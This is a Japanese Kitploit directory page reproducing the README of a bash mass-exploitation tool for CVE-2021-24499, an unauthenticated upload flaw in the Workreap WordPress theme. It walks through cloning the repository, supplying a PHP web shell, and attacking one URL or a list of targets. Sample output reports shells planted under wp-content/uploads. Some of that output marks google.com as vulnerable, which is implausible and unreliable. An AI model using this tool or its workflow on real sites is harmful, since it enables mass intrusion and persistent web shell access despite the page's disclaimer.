Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-24499 — WordPressテーマ Workreap 2.2.2 - 認証なしアップロードによるリモートコード実行 | Kitploit
ツール/GitHubGitHub/jayhutajulu1/cve-2021-24499
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubjayhutajulu1/cve-2021-24499

CVE-2021-24499

WordPressテーマ Workreap 2.2.2 - 認証なしアップロードによるリモートコード実行

リポジトリを見る
6ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-24499 | Workreap - Freelance Marketplace and Directory WordPress Theme < 2.2.2 - 任意のファイルアップロード

CVE License Shell

WordPress Theme Workreap 2.2.2 - 認証不要のファイルアップロードによるリモートコード実行

WordPress WorkreapテーマのCVE-2021-24499脆弱性を対象とした、強力で正確な大量悪用ツールです。このエクスプロイトは認証不要のファイルアップロードを可能にし、リモートコード実行(RCE)につながる可能性があります。

📝 説明

CVE-2021-24499は、WordPress Workreapテーマ(バージョン2.2.2以下)の重大な脆弱性で、認証されていないユーザーがworkreap_award_temp_file_uploader AJAXアクションを介してPHPファイルを含む任意のファイルをアップロードできるようにします。これにより、ターゲットサーバー上でリモートコード実行(RCE)が発生する可能性があります。

影響を受けるバージョン: 2.2.2を含むすべてのバージョン

CVSSスコア: 重大

📦 必要条件

  • Bashシェル(Linux/macOS/WSL)
  • curlコマンドラインツール
  • opts.phpまたはshell.phpファイル(PHPウェブシェル)

🔧 インストール

  1. このリポジトリをクローン:
root@kitploit:~
git clone https://github.com/jayhutajulu1/CVE-2021-24499.git
cd CVE-2021-24499
  1. スクリプトを実行可能にする:
root@kitploit:~
chmod +x exploit.sh
  1. 同じディレクトリにopts.phpまたはshell.php(PHPウェブシェル)があることを確認してください

🚀 使い方

基本的な使い方

単一ターゲット:

root@kitploit:~
./exploit.sh -u http://target.com

複数ターゲット(ファイルから):

root@kitploit:~
./exploit.sh -l targets.txt

ヘルプを表示:

root@kitploit:~
./exploit.sh --help

コマンドラインオプション

オプション説明
-u URL単一のターゲットURLを攻撃
-l FILEファイルから複数のターゲットを攻撃(1行に1つのURL)
--helpヘルプメニューを表示

ターゲットファイルの形式

1行に1つのURLを記述したテキストファイルを作成:

root@kitploit:~
http://target1.com
https://target2.com
http://target3.com

📸 例

例1: 単一ターゲットの攻撃

root@kitploit:~
$ ./exploit.sh -u https://domain.com

WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution | CVE-2021-24499
Made by Jay Maranatha Hutajulu

https://domain.com/ >> VULNERABLE! 
 --> SHELL: https://domain.com//wp-content/uploads/workreap-temp/shell.php

例2: 大量攻撃

root@kitploit:~
$ ./exploit.sh -l targets.txt

WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution | CVE-2021-24499
Made by Jay Maranatha Hutajulu

https://domain.com >> NOT VULNERABLE!
https://www.google.com >> VULNERABLE!
https://www.domain.com >> NOT VULNERABLE!
https://google.com >> VULNERABLE!

⚠️ 免責事項

このツールは教育的かつ許可されたテスト目的のみで提供されています。

  • 使用しないでください: 自分が所有していない、または明示的な書面による許可がないシステムでこのツールを使用しないでください
  • 使用しないでください: 違法行為にこのツールを使用しないでください
  • 作者および貢献者は、このツールの誤用または損害に対して一切の責任を負いません
  • システムをテストする前に、適切な承認を得ていることを常に確認してください
  • 責任を持って倫理的に使用してください

このツールを使用することにより、正当なセキュリティテストおよび研究目的でのみ使用することに同意したものとみなされます。

🔗 参考文献

  • Exploit-DB
  • Wordfence
  • WP-Scan

👤 クレジット

作者: Jay Maranatha Hutajulu

📄 ライセンス

このプロジェクトはMITライセンスの下で提供されています。詳細はLICENSEファイルを参照してください。

🤝 コントリビューション

コントリビューション、問題報告、機能リクエストを歓迎します!遠慮なくissuesページをご確認ください。

⭐ スター履歴

このツールが役に立ったと思われたら、スター⭐を付けていただけると幸いです。


注意: セキュリティツールは常に責任を持って倫理的に使用してください。ハッピーハッキング!🚀

ツールをダウンロード